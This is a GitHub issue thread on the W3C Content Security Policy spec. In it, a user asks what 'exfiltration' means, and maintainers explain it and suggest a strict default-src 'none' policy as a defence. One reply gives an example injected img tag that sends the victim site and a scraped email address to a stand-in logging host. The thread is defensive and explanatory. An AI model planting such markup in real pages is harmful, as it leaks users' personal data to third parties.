Skip to content

Queries about exfiltration? #671

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
Blason opened this issue Jul 9, 2024 · 2 comments
Closed

Queries about exfiltration? #671

Blason opened this issue Jul 9, 2024 · 2 comments

Comments

@Blason
Copy link

Blason commented Jul 9, 2024

Can someone provide me any examples about https://w3c.github.io/webappsec-csp/#exfiltration?
I am still not clear about how exfiltration would occur which contents of the request, such as the URL, contain information about the user or page that should be restricted and not shared.

Can someone please help?
@annevk
Copy link
Member

annevk commented Jul 9, 2024

This type of question is probably better suited for Stack Overflow, but think of an attacker inserting something like <img src=https://someotherdomain/logger?victim=victim.com&user=emailaddressScrapedFromThePageAndInsertedWithJS>.

@annevk annevk closed this as not planned Won't fix, can't repro, duplicate, stale Jul 9, 2024
@benatkin
Copy link

benatkin commented Aug 31, 2024
edited
Loading

To prevent it you add very strict content security policies, like default-src: 'none' and it should almost work. The only exception I know of is #92 which is shipped in the spec but not in browsers: https://wpt.fyi/results/content-security-policy/webrtc?label=experimental&label=master&aligned

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@benatkin @annevk @Blason